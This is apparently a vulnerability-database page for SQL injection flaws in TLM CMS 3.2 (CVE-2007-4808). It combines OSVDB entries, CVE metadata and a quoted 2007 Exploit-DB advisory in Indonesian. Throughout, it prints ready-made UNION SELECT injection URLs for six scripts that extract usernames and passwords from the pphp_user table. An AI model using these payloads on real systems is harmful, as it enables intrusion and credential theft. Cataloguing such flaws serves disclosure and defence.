Search...

TLM CMS affichage.php ID Variable SQL Injection

2007-09-08T00:00:00

ID OSVDB:37004
Type osvdb
Reporter OSVDB
Modified 2007-09-08T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*

References:

Secunia Advisory ID:26752 Related OSVDB ID: 37001 Related OSVDB ID: 37002 Related OSVDB ID: 37005 Related OSVDB ID: 37003 Related OSVDB ID: 37006 Other Advisory URL: http://milw0rm.com/exploits/4376 ISS X-Force ID: 36536 FrSIRT Advisory: ADV-2007-3137 CVE-2007-4808 Bugtraq ID: 25602

JSON Vulners Source

Initial Source

{"bulletinFamily": "software", "viewCount": 3, "reporter": "OSVDB", "references": [], "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:37004", "modified": "2007-09-08T00:00:00", "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2017-04-28T13:20:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4808"]}, {"type": "osvdb", "idList": ["OSVDB:37006", "OSVDB:37002", "OSVDB:37003", "OSVDB:37005", "OSVDB:37001"]}, {"type": "exploitdb", "idList": ["EDB-ID:4376"]}], "modified": "2017-04-28T13:20:33", "rev": 2}, "vulnersScore": 6.6}, "id": "OSVDB:37004", "title": "TLM CMS affichage.php ID Variable SQL Injection", "edition": 1, "published": "2007-09-08T00:00:00", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2007-4808"], "lastseen": "2017-04-28T13:20:33"}

{"cve": [{"lastseen": "2020-10-03T11:45:53", "description": "Multiple SQL injection vulnerabilities in TLM CMS 3.2 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter to news.php in a lirenews action, (2) the idnews parameter to goodies.php in a lire action, (3) the id parameter to file.php in a voir action, (4) the ID parameter to affichage.php, (5) the id_sal parameter to mod_forum/afficher.php, or (6) the id_sujet parameter to mod_forum/messages.php. NOTE: it was later reported that goodies.php and affichage.php scripts are reachable through index.php, and 1.1 is also affected. NOTE: it was later reported that the goodies.php vector also affects 3.1.", "edition": 3, "cvss3": {}, "published": "2007-09-11T18:17:00", "title": "CVE-2007-4808", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4808"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:tlm_cms:tlm_cms:3.2", "cpe:/a:tlm_cms:tlm_cms:1.1"], "id": "CVE-2007-4808", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4808", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tlm_cms:tlm_cms:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:tlm_cms:tlm_cms:3.2:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4808"], "description": "## Manual Testing Notes\nhttp://[target]/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "edition": 1, "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37002", "id": "OSVDB:37002", "title": "TLM CMS goodies.php idnews Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4808"], "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "edition": 1, "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37003", "id": "OSVDB:37003", "title": "TLM CMS file.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4808"], "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "edition": 1, "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37006", "id": "OSVDB:37006", "title": "TLM CMS mod_forum/messages.php id_sujet Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4808"], "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Manual Testing Notes\nhttp://[target]/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37001](https://vulners.com/osvdb/OSVDB:37001)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "edition": 1, "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37005", "id": "OSVDB:37005", "title": "TLM CMS mod_forum/afficher.php id_sal Vaariable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-4808"], "description": "## Manual Testing Notes\nhttp://[target]/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*\n## References:\n[Secunia Advisory ID:26752](https://secuniaresearch.flexerasoftware.com/advisories/26752/)\n[Related OSVDB ID: 37002](https://vulners.com/osvdb/OSVDB:37002)\n[Related OSVDB ID: 37005](https://vulners.com/osvdb/OSVDB:37005)\n[Related OSVDB ID: 37003](https://vulners.com/osvdb/OSVDB:37003)\n[Related OSVDB ID: 37004](https://vulners.com/osvdb/OSVDB:37004)\n[Related OSVDB ID: 37006](https://vulners.com/osvdb/OSVDB:37006)\nOther Advisory URL: http://milw0rm.com/exploits/4376\nISS X-Force ID: 36536\nFrSIRT Advisory: ADV-2007-3137\n[CVE-2007-4808](https://vulners.com/cve/CVE-2007-4808)\nBugtraq ID: 25602\n", "edition": 1, "modified": "2007-09-08T00:00:00", "published": "2007-09-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37001", "id": "OSVDB:37001", "title": "TLM CMS news.php id Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:47:14", "description": "TLM CMS 3.2 Multiple Remote SQL Injection Vulnerabilities. CVE-2007-4808. Webapps exploit for php platform", "published": "2007-09-08T00:00:00", "type": "exploitdb", "title": "TLM CMS 3.2 - Multiple Remote SQL Injection Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4808"], "modified": "2007-09-08T00:00:00", "id": "EDB-ID:4376", "href": "https://www.exploit-db.com/exploits/4376/", "sourceData": "########################################################################\n# TLM CMS v3.2 - Multiple Remote SQL Injection Vulnerabilities\n# Vendor : http://tlm.hebserv.fr/\n# Download : http://tlm.hebserv.fr/mod_file/upload/tlmcms32.zip\n# Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org\n# Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net\n########################################################################\nKutu pada berkas 'news.php';\nhttp://localhost/tlmcms32/news.php?act=lirenews&id=-9%20UNION%20SELECT%200,US_pseudo,US_pwd,0,0,0,0,0,0,0%20from%20pphp_user/*\n\nKutu pada berkas 'goodies.php';\nhttp://localhost/tlmcms32/goodies.php?act=lire&idnews=-9%20UNION%20SELECT%200,0,0,US_pseudo,US_pwd,0,0,0,0,0,0%20from%20pphp_user/*\n\n<-------------------------->\nJika magic_quotes_gpc = off, maka pada berkas2 berikut dapat memanipulasi\nSQL query;\n\nKutu pada berkas 'file.php';\nhttp://localhost/tlmcms32/file.php?action=voir&id=-9'UNION%20SELECT%200,0,0,US_pseudo,0,US_pwd,0,0,0,0%20from%20pphp_user/*\n\nKutu pada berkas 'affichage.php';\nhttp://localhost/tlmcms32/affichage.php?ID=-9'UNION%20SELECT%200,0,0,US_pseudo,US_pwd%20from%20pphp_user/*\n\nKutu pada berkas '/mod_forum/afficher.php';\nhttp://localhost/tlmcms32/mod_forum/afficher.php?id_sal=-9'%20UNION%20SELECT%20US_pseudo,US_pwd,0%20from%20pphp_user/*\n\nKutu pada berkas '/mod_forum/messages.php';\nhttp://localhost/tlmcms32/mod_forum/messages.php?id_sujet=-9'UNION%20SELECT%20US_pseudo,0%20from%20pphp_user/*\n\n########################################################################\nTerimakasih untuk;\nstr0ke, DNX\nxoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank\ndan semua temen2 komunitas security&hacking\n-----------------------\n-newhack[dot]org|staff-\nmR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX\n-----------------------\nall member newhack[dot]org\n-----------------------\nall member www.echo.or.id\n-----------------------\nall member www.yogyafree.net\n-----------------------\nall member www.sekuritionline.net\n-----------------------\nall member www.kecoak-elektronik.net\n-----------------------\nsemua komunitas hacker&security Indonesia\nCintailah Bahasa Indonesia\n\n# milw0rm.com [2007-09-08]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4376/"}]}